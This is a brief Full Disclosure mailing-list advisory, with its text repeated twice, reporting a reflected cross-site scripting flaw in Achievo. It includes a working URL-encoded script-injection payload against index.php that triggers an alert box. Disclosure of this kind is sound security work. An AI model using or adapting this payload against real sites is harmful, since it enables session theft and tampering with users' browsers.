Exploit Title: Achievo Cross Site Scripting vulnerability Vendor: www.achievo.org Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=98 Author: SECUPENT Website:www.secupent.com Email: research{at}secupent{dot}com Date: 20-3-2016
Cross Site scripting link: http://site/achievo/index.php?%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x000912%29%3C%2fscRipt%3E Screenshot: http://secupent.com/exploit/images/achievoxss.jpg
Exploit Title: Achievo Cross Site Scripting vulnerability Vendor: www.achievo.org Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=98 Author: SECUPENT Website:www.secupent.com Email: research{at}secupent{dot}com Date: 20-3-2016 Cross Site scripting link: http://site/achievo/index.php?%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x000912%29%3C%2fscRipt%3E Screenshot: http://secupent.com/exploit/images/achievoxss.jpg
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
